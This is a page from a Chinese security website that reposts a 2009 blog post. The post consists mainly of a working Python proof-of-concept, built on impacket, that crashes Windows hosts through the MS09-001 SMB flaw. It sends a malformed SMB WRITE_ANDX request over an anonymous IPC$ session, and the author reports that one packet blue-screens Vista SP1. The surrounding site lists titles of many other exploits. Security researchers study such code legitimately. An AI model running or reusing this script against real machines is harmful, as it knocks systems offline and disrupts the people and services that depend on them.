首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 MS09-001 SMB Dos Poc Exploit 来源：http://hi.baidu.com/vessial/blog 作者：vessial 发布时间：2009-02-02   今天用python写了一个SMB dos的poc，测试vista sp1， 一个包过去立刻蓝屏，不过XP SP2还有点问题。 # MS09-001 SMB Dos Vulnerabilities Poc Exploit # Author : vessial # http://hi.baidu.com/vessial # Todo: # [+] test vista sp1,system BOSD # Reference :http://www.microsoft.com/technet/security/Bulletin/MS09-001.mspx #                 http://www.milw0rm.com/exploits/6463 import impacket from impacket import smb from impacket import nmb remote = smb.SMBPacket('') r = smb.SMB('*SMBSERVER','192.168.40.129',None,nmb.TYPE_SERVER,445) r._login('','','','WORKGROUP') tid = r.tree_connect_andx('\\\\192.168.40.129\\IPC$') smb1 = smb.NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0xc807 smb1['Tid']    = tid ntCreate = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX) ntCreate['Parameters'] = smb.SMBNtCreateAndX_Parameters() ntCreate['Data']       = smb.SMBNtCreateAndX_Data() ntCreate['Parameters']['FileNameLength'] = 14 ntCreate['Parameters']['AndXOffset'] = 0xdede ntCreate['Parameters']['CreateFlags'] = 0x16 ntCreate['Parameters']['AccessMask'] = 0x2019f ntCreate['Parameters']['CreateOptions'] = 0x400040 ntCreate['Parameters']['ShareAccess'] = 7 ntCreate['Parameters']['Impersonation'] = 2 ntCreate['Parameters']['Disposition'] = 1 ntCreate['Data'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00" smb1.addCommand(ntCreate) r.sendSMB(smb1) recv=r.recvSMB() if recv.isValidAnswer(smb.SMB.SMB_COM_NT_CREATE_ANDX):     ntCreateResponse = smb.SMBCommand(recv['Data'][0])     ntCreateParameters =smb.SMBNtCreateAndXResponse_Parameters(ntCreateResponse['Parameters'])     fid = ntCreateParameters['Fid'] smb1 = smb.NewSMBPacket() smb1['Flags1'] = 0x18 smb1['Flags2'] = 0 smb1['Tid']    = tid data = "A"*72 writeAndX = smb.SMBCommand(smb.SMB.SMB_COM_WRITE_ANDX) smb1.addCommand(writeAndX) writeAndX['Parameters'] = smb.SMBWriteAndX_Parameters() writeAndX['Parameters']['Fid'] = fid writeAndX['Parameters']['AndXOffset'] = 0xdede writeAndX['Parameters']['Offset'] = 0 writeAndX['Parameters']['WriteMode'] = 8 writeAndX['Parameters']['Remaining'] = len(data) writeAndX['Parameters']['_reserved'] = -1 writeAndX['Parameters']['DataLength'] = 0xffff writeAndX['Parameters']['DataOffset'] = 0xffff writeAndX['Parameters']['HighOffset'] = 0xcccccccc writeAndX['Data'] = data r.sendSMB(smb1)   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Jieqi cms v1.5 remote code exe ·Php168 v2008 权限提升漏洞 ·Google Chrome 1.0.154.46 (Chro ·Spider Player 2.3.9.5 (asx Fil ·Small HTTP Server <= 3.05.85 D ·eVision CMS <= 2.0 (field) SQL ·Flatnux 2009-01-27 (Job fields ·SkaLinks 1.5 (Auth Bypass) SQL ·Elecard AVC HD PLAYER (m3u/xpl ·Orca 2.0.2 (Topic) Remote XSS ·RealVNC 4.1.2 (vncviewer.exe) ·BPAutoSales 1.0.1 (XSS/SQL) Mu   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved